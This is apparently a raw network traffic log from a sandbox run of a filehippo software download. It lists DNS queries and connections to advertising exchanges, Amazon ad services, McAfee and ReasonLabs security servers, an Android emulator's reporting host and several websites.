US 8.8.8.8:53 ms-cookie-sync.presage.io udp
GB 2.21.188.239:443 ads.pubmatic.com tcp
US 172.64.149.180:443 js-sec.indexww.com tcp
BE 23.55.98.169:443 eus.rubiconproject.com tcp
US 151.101.129.108:443 acdn.adnxs.com tcp
IE 34.249.60.124:443 ms-cookie-sync.presage.io tcp
IE 34.249.60.124:443 ms-cookie-sync.presage.io tcp
US 76.223.111.18:443 eb2.3lift.com tcp
US 8.8.8.8:53 108.129.101.151.in-addr.arpa udp
US 8.8.8.8:53 124.60.249.34.in-addr.arpa udp
US 8.8.8.8:53 ssum-sec.casalemedia.com udp
US 8.8.8.8:53 token.rubiconproject.com udp
NL 69.173.156.148:443 token.rubiconproject.com tcp
US 8.8.8.8:53 cdn.indexww.com udp
US 8.8.8.8:53 d3419h2vl8o3m4.cloudfront.net udp
GB 18.172.155.204:443 d3419h2vl8o3m4.cloudfront.net tcp
GB 18.172.155.204:443 d3419h2vl8o3m4.cloudfront.net tcp
US 8.8.8.8:53 204.155.172.18.in-addr.arpa udp
GB 18.172.155.204:443 d3419h2vl8o3m4.cloudfront.net tcp
GB 18.172.155.204:443 d3419h2vl8o3m4.cloudfront.net tcp
US 8.8.8.8:53 sc.filehippo.net udp
US 23.219.230.135:443 sc.filehippo.net tcp
US 8.8.8.8:53 m.media-amazon.com udp
US 151.101.1.16:443 m.media-amazon.com tcp
US 151.101.1.16:443 m.media-amazon.com udp
US 8.8.8.8:53 ts.amazon-adsystem.com udp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
US 8.8.8.8:53 connatix-d.openx.net udp
GB 18.245.218.37:443 ts.amazon-adsystem.com tcp
IE 52.95.115.196:443 aax-eu.amazon-adsystem.com tcp
US 35.244.159.8:443 connatix-d.openx.net udp
US 8.8.8.8:53 s2.paa-reporting-advertising.amazon udp
GB 54.192.137.67:443 s2.paa-reporting-advertising.amazon tcp
US 8.8.8.8:53 assets.connatix.com udp
GB 108.156.39.62:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
US 8.8.8.8:53 16.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 37.218.245.18.in-addr.arpa udp
US 8.8.8.8:53 67.137.192.54.in-addr.arpa udp
US 8.8.8.8:53 dl5.filehippo.com udp
US 151.101.193.91:443 dl5.filehippo.com tcp
US 8.8.8.8:53 91.193.101.151.in-addr.arpa udp
IE 52.95.115.196:443 aax-eu.amazon-adsystem.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 cds.connatix.com udp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
GB 18.245.218.37:443 ts.amazon-adsystem.com tcp
GB 18.245.218.37:443 ts.amazon-adsystem.com tcp
GB 18.245.218.37:443 ts.amazon-adsystem.com tcp
ES 172.217.17.3:443 csi.gstatic.com udp
US 8.8.8.8:53 m.media-amazon.com udp
GB 18.244.122.174:443 m.media-amazon.com udp
US 8.8.8.8:53 174.122.244.18.in-addr.arpa udp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 67.220.224.144:443 aax-eu.amazon-adsystem.com tcp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
ES 172.217.17.3:443 csi.gstatic.com udp
US 8.8.8.8:53 aefd.nelreports.net udp
US 2.19.252.146:443 aefd.nelreports.net udp
GB 18.244.140.6:443 shield.reasonsecurity.com tcp
US 8.8.8.8:53 d3419h2vl8o3m4.cloudfront.net udp
GB 18.172.155.189:443 d3419h2vl8o3m4.cloudfront.net tcp
GB 18.172.155.189:443 d3419h2vl8o3m4.cloudfront.net tcp
GB 18.244.140.6:443 shield.reasonsecurity.com tcp
US 8.8.8.8:53 6.140.244.18.in-addr.arpa udp
US 8.8.8.8:53 189.155.172.18.in-addr.arpa udp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
US 8.8.8.8:53 csi.gstatic.com udp
US 142.250.72.163:443 csi.gstatic.com udp
US 8.8.8.8:53 analytics.apis.mcafee.com udp
US 35.155.69.169:443 analytics.apis.mcafee.com tcp
US 8.8.8.8:53 163.72.250.142.in-addr.arpa udp
US 8.8.8.8:53 169.69.155.35.in-addr.arpa udp
US 8.8.8.8:53 sadownload.mcafee.com udp
US 2.20.12.102:443 sadownload.mcafee.com tcp
US 8.8.8.8:53 track.analytics-data.io udp
US 8.8.8.8:53 102.12.20.2.in-addr.arpa udp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 8.8.8.8:53 update.reasonsecurity.com udp
GB 18.154.84.124:443 update.reasonsecurity.com tcp
US 8.8.8.8:53 electron-shell.reasonsecurity.com udp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
GB 108.156.46.38:443 electron-shell.reasonsecurity.com tcp
US 8.8.8.8:53 161.21.208.18.in-addr.arpa udp
US 8.8.8.8:53 124.84.154.18.in-addr.arpa udp
US 8.8.8.8:53 38.46.156.108.in-addr.arpa udp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 18.208.21.161:443 track.analytics-data.io tcp
US 2.20.12.102:443 sadownload.mcafee.com tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 8.8.8.8:53 home.mcafee.com udp
BE 104.68.84.174:443 home.mcafee.com tcp
US 35.155.69.169:443 analytics.apis.mcafee.com tcp
US 8.8.8.8:53 174.84.68.104.in-addr.arpa udp
US 35.155.69.169:443 analytics.apis.mcafee.com tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 8.8.8.8:53 cdn.reasonsecurity.com udp
US 18.208.21.161:443 track.analytics-data.io tcp
GB 52.84.90.44:443 cdn.reasonsecurity.com tcp
US 8.8.8.8:53 44.90.84.52.in-addr.arpa udp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 8.8.8.8:53 capi.connatix.com udp
US 104.18.41.104:443 capi.connatix.com tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 158.33.239.54.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:80 www.microsoft.com tcp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 sadownload.mcafee.com udp
US 2.20.12.102:443 sadownload.mcafee.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 8.8.8.8:53 ts.amazon-adsystem.com udp
US 8.8.8.8:53 m.media-amazon.com udp
US 18.208.21.161:443 track.analytics-data.io tcp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
GB 18.165.198.31:443 m.media-amazon.com tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 8.8.8.8:53 31.198.165.18.in-addr.arpa udp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
US 8.8.8.8:53 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev udp
GB 108.156.39.33:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 8.8.8.8:53 track.analytics-data.io udp
US 34.238.47.185:443 track.analytics-data.io tcp
US 8.8.8.8:53 102.137.192.54.in-addr.arpa udp
US 8.8.8.8:53 33.39.156.108.in-addr.arpa udp
US 8.8.8.8:53 185.47.238.34.in-addr.arpa udp
SE 192.229.221.95:80 cacerts.rapidssl.com tcp
GB 18.165.198.31:443 m.media-amazon.com tcp
US 8.8.8.8:53 config.reasonsecurity.com udp
GB 99.86.114.75:443 config.reasonsecurity.com tcp
US 8.8.8.8:53 75.114.86.99.in-addr.arpa udp
US 104.18.41.104:443 capi.connatix.com tcp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:80 www.microsoft.com tcp
US 172.64.146.152:443 capi.connatix.com tcp
US 8.8.8.8:53 74.19.199.152.in-addr.arpa udp
US 172.64.146.152:443 capi.connatix.com tcp
US 8.8.8.8:53 sf.symcd.com udp
US 8.8.8.8:53 report1.smartgaga.com udp
US 152.199.19.74:80 sf.symcd.com tcp
US 152.199.19.74:80 sf.symcd.com tcp
US 8.8.8.8:53 crl.thawte.com udp
SE 192.229.221.95:80 crl.thawte.com tcp
US 8.8.8.8:53 api.reasonsecurity.com udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 34.238.47.185:443 track.analytics-data.io tcp
US 8.8.8.8:53 235.0.22.104.in-addr.arpa udp
US 8.8.8.8:53 mc6.reasonsecurity.com udp
US 52.43.110.0:443 mc6.reasonsecurity.com tcp
US 104.18.41.104:443 capi.connatix.com tcp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
GB 18.165.198.31:443 m.media-amazon.com tcp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
US 142.250.72.163:443 csi.gstatic.com udp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
GB 108.156.39.33:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
US 8.8.8.8:53 0.110.43.52.in-addr.arpa udp
GB 52.84.90.44:443 cdn.reasonsecurity.com tcp
US 8.8.8.8:53 cdn.reasonsecurity.com udp
US 8.8.8.8:53 cdn.reasonsecurity.com udp
GB 52.84.90.87:443 cdn.reasonsecurity.com tcp
GB 52.84.90.87:443 cdn.reasonsecurity.com tcp
US 104.18.41.104:443 capi.connatix.com tcp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:53 87.90.84.52.in-addr.arpa udp
US 8.8.8.8:53 edge.microsoft.com udp
US 204.79.197.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 msedgeextensions.b.tlu.dl.delivery.mp.microsoft.com udp
GB 87.248.204.0:80 msedgeextensions.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 239.197.79.204.in-addr.arpa udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 8.8.8.8:53 track.analytics-data.io udp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 18.208.21.161:443 track.analytics-data.io tcp
US 104.18.41.104:443 capi.connatix.com tcp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
IE 54.239.33.158:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 104.18.41.104:443 capi.connatix.com tcp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
GB 18.165.198.31:443 m.media-amazon.com tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
GB 108.156.39.33:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
US 8.8.8.8:53 232.226.220.67.in-addr.arpa udp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
GB 18.165.198.31:443 m.media-amazon.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 104.18.41.104:443 capi.connatix.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 edr-api.reasonlabsapi.com udp
GB 143.204.176.113:443 edr-api.reasonlabsapi.com tcp
US 34.238.47.185:443 track.analytics-data.io tcp
US 8.8.8.8:53 113.176.204.143.in-addr.arpa udp
US 104.18.41.104:443 capi.connatix.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 m.media-amazon.com udp
GB 18.154.87.195:443 m.media-amazon.com tcp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
US 142.250.72.163:443 csi.gstatic.com udp
US 8.8.8.8:53 195.87.154.18.in-addr.arpa udp
GB 18.245.218.76:443 ts.amazon-adsystem.com tcp
GB 18.245.218.76:443 ts.amazon-adsystem.com tcp
US 8.8.8.8:53 76.218.245.18.in-addr.arpa udp
US 8.8.8.8:53 s2.paa-reporting-advertising.amazon udp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
US 8.8.8.8:53 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev udp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
GB 108.156.39.71:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
GB 108.156.39.71:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
US 8.8.8.8:53 71.39.156.108.in-addr.arpa udp
US 104.18.41.104:443 capi.connatix.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 8.8.8.8:53 report1.smartgaga.com udp
US 104.18.41.104:443 capi.connatix.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
US 104.18.41.104:443 capi.connatix.com tcp
US 8.8.8.8:53 cds.connatix.com udp
GB 18.245.218.76:443 ts.amazon-adsystem.com tcp
GB 18.154.87.195:443 m.media-amazon.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
GB 108.156.39.71:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
GB 18.154.87.195:443 m.media-amazon.com tcp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 66.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 report1.smartgaga.com udp
US 104.18.41.104:443 cds.connatix.com tcp
IE 67.220.226.232:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 www.smartgaga.com udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 sw.symcd.com udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 152.199.19.74:80 sw.symcd.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 104.18.41.104:443 cds.connatix.com tcp
GB 18.154.87.195:443 m.media-amazon.com tcp
US 8.8.8.8:53 ox-rtb-europe-west2.openx.net udp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
US 142.250.72.163:443 csi.gstatic.com udp
GB 18.245.218.76:443 ts.amazon-adsystem.com tcp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
GB 108.156.39.71:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
US 104.18.41.104:443 cds.connatix.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 104.18.41.104:443 cds.connatix.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 104.18.41.104:443 cds.connatix.com tcp
GB 18.245.218.76:443 ts.amazon-adsystem.com tcp
GB 18.245.218.76:443 ts.amazon-adsystem.com tcp
US 8.8.8.8:53 s2.paa-reporting-advertising.amazon udp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
GB 54.192.137.67:443 s2.paa-reporting-advertising.amazon tcp
US 8.8.8.8:53 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev udp
GB 108.156.39.97:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
US 8.8.8.8:53 97.39.156.108.in-addr.arpa udp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 www.wireshark.org udp
US 104.26.10.240:443 www.wireshark.org tcp
SE 192.229.221.95:80 crl.thawte.com tcp
US 104.22.0.235:443 api.reasonsecurity.com tcp
US 8.8.8.8:53 m.media-amazon.com udp
US 8.8.8.8:53 240.10.26.104.in-addr.arpa udp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
GB 18.244.122.174:443 m.media-amazon.com tcp
N/A 127.0.0.1:5037 tcp
US 104.18.41.104:443 cds.connatix.com tcp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
US 8.8.8.8:53 pubads.g.doubleclick.net udp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net tcp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
US 104.18.41.104:443 cds.connatix.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.228.203:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
GB 18.244.122.174:443 m.media-amazon.com tcp
US 8.8.8.8:53 capi.connatix.com udp
US 104.18.41.104:443 capi.connatix.com tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 52.95.122.74:443 aax-eu.amazon-adsystem.com tcp
IE 52.95.122.74:443 aax-eu.amazon-adsystem.com tcp
GB 18.245.218.76:443 ts.amazon-adsystem.com tcp
GB 54.192.137.67:443 s2.paa-reporting-advertising.amazon tcp
GB 108.156.39.97:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
IE 52.95.122.74:443 aax-eu.amazon-adsystem.com tcp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 104.18.41.104:443 capi.connatix.com tcp
IE 52.95.122.74:443 aax-eu.amazon-adsystem.com tcp
US 142.250.72.163:443 csi.gstatic.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
NL 23.62.61.194:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.194:443 th.bing.com tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.34.36:443 region1.google-analytics.com udp
US 172.64.154.167:443 www2.bing.com tcp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 www.elevenforum.com udp
US 104.26.9.212:443 www.elevenforum.com tcp
US 104.26.9.212:443 www.elevenforum.com tcp
US 8.8.8.8:53 cdn.fuseplatform.net udp
US 8.8.8.8:53 212.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 support.microsoft.com udp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
BE 23.55.96.117:443 support.microsoft.com tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
BE 64.233.167.157:443 stats.g.doubleclick.net udp
US 8.8.8.8:53 90.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 117.96.55.23.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
US 8.8.8.8:53 c.amazon-adsystem.com udp
US 8.8.8.8:53 cmp.inmobi.com udp
GB 18.244.114.102:443 cmp.inmobi.com tcp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 151.101.129.229:443 cdn.jsdelivr.net udp
GB 52.84.90.106:443 config.aps.amazon-adsystem.com tcp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 cdn.id5-sync.com udp
US 104.22.75.216:443 btloader.com tcp
US 104.22.53.86:443 cdn.id5-sync.com tcp
US 8.8.8.8:53 api.btloader.com udp
US 130.211.23.194:443 api.btloader.com udp
US 8.8.8.8:53 102.114.244.18.in-addr.arpa udp
US 104.26.3.70:443 ad-delivery.net tcp
US 8.8.8.8:53 api.cmp.inmobi.com udp
DE 54.93.106.56:443 api.cmp.inmobi.com tcp
DE 54.93.106.56:443 api.cmp.inmobi.com tcp
US 104.26.9.212:443 www.elevenforum.com tcp
US 8.8.8.8:53 70.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 56.106.93.54.in-addr.arpa udp
US 8.8.8.8:53 id5-sync.com udp
US 8.8.8.8:53 lb.eu-1-id5-sync.com udp
US 8.8.8.8:53 i.connectad.io udp
US 8.8.8.8:53 tlx.3lift.com udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 htlb.casalemedia.com udp
US 8.8.8.8:53 prebid.a-mo.net udp
US 8.8.8.8:53 tags.crwdcntrl.net udp
NL 178.250.1.8:443 bidder.criteo.com tcp
US 8.8.8.8:53 rtb.openx.net udp
US 8.8.8.8:53 g2.gumgum.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 fastlane.rubiconproject.com udp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
US 172.64.151.101:443 htlb.casalemedia.com tcp
US 35.186.253.211:443 rtb.openx.net tcp
NL 185.89.210.153:443 ib.adnxs.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
NL 147.75.84.158:443 prebid.a-mo.net tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
GB 18.245.143.83:443 tags.crwdcntrl.net tcp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
US 104.22.54.206:443 i.connectad.io tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
US 104.22.54.206:443 i.connectad.io tcp
GB 18.245.143.83:443 tags.crwdcntrl.net tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
US 8.8.8.8:53 report1.smartgaga.com udp
US 8.8.8.8:53 120.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 153.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 211.253.186.35.in-addr.arpa udp
US 8.8.8.8:53 33.239.48.52.in-addr.arpa udp
US 8.8.8.8:53 176.168.78.3.in-addr.arpa udp
US 8.8.8.8:53 83.143.245.18.in-addr.arpa udp
IE 52.95.122.74:443 aax-eu.amazon-adsystem.com tcp
IE 52.95.122.74:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 7e84fa503e0a0177c37461334c82ed65.safeframe.googlesyndication.com udp
US 8.8.8.8:53 1x1.a-mo.net udp
NL 178.250.1.3:443 static.criteo.net tcp
US 8.8.8.8:53 bcp.crwdcntrl.net udp
GB 172.217.169.65:443 7e84fa503e0a0177c37461334c82ed65.safeframe.googlesyndication.com tcp
DE 3.67.143.30:443 1x1.a-mo.net tcp
IE 54.229.28.67:443 bcp.crwdcntrl.net tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
DE 3.67.143.30:443 1x1.a-mo.net tcp
GB 172.217.169.65:443 7e84fa503e0a0177c37461334c82ed65.safeframe.googlesyndication.com tcp
IE 54.229.28.67:443 bcp.crwdcntrl.net tcp
US 35.186.253.211:443 rtb.openx.net udp
US 8.8.8.8:53 cdn.ampproject.org udp
NL 178.250.1.11:443 gum.criteo.com tcp
GB 142.250.187.225:443 cdn.ampproject.org udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 dnacdn.net udp
NL 185.235.87.44:443 gem.gbc.criteo.com tcp
NL 185.235.87.150:443 ag.gbc.criteo.com tcp
GB 142.250.187.196:443 www.google.com udp
NL 178.250.1.11:443 dnacdn.net tcp
US 8.8.8.8:53 67.28.229.54.in-addr.arpa udp
US 8.8.8.8:53 30.143.67.3.in-addr.arpa udp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
NL 178.250.1.11:443 dnacdn.net tcp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
NL 178.250.1.11:443 dnacdn.net tcp
US 104.26.9.212:443 www.elevenforum.com tcp
NL 178.250.1.8:443 bidder.criteo.com tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
NL 147.75.84.158:443 prebid.a-mo.net tcp
NL 89.149.193.113:443 prg-apac.smartadserver.com tcp
US 104.22.54.206:443 i.connectad.io tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
US 172.64.151.101:443 htlb.casalemedia.com tcp
IE 52.48.239.33:443 g2.gumgum.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 185.89.210.153:443 ib.adnxs.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
DE 3.67.143.30:443 1x1.a-mo.net tcp
BE 23.14.90.90:443 cdn.fuseplatform.net tcp
IE 52.95.122.74:443 aax-eu.amazon-adsystem.com tcp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
IE 52.95.122.74:443 aax-eu.amazon-adsystem.com tcp
BE 23.14.90.89:443 m.media-amazon.com tcp
BE 23.14.90.89:443 m.media-amazon.com tcp
US 8.8.8.8:53 ts.amazon-adsystem.com udp
GB 18.245.218.63:443 ts.amazon-adsystem.com tcp
US 8.8.8.8:53 aan.amazon.co.uk udp
IE 3.254.237.161:443 aan.amazon.co.uk tcp
IE 3.254.237.161:443 aan.amazon.co.uk tcp
US 8.8.8.8:53 s2.paa-reporting-advertising.amazon udp
IE 3.254.237.161:443 aan.amazon.co.uk tcp
GB 54.192.137.102:443 s2.paa-reporting-advertising.amazon tcp
IE 3.254.237.161:443 aan.amazon.co.uk tcp
IE 3.254.237.161:443 aan.amazon.co.uk tcp
US 8.8.8.8:53 89.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 63.218.245.18.in-addr.arpa udp
US 8.8.8.8:53 161.237.254.3.in-addr.arpa udp
US 8.8.8.8:53 sq-tungsten-ts-eu.amazon-adsystem.com udp
US 8.8.8.8:53 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev udp
IE 3.254.239.147:443 sq-tungsten-ts-eu.amazon-adsystem.com tcp
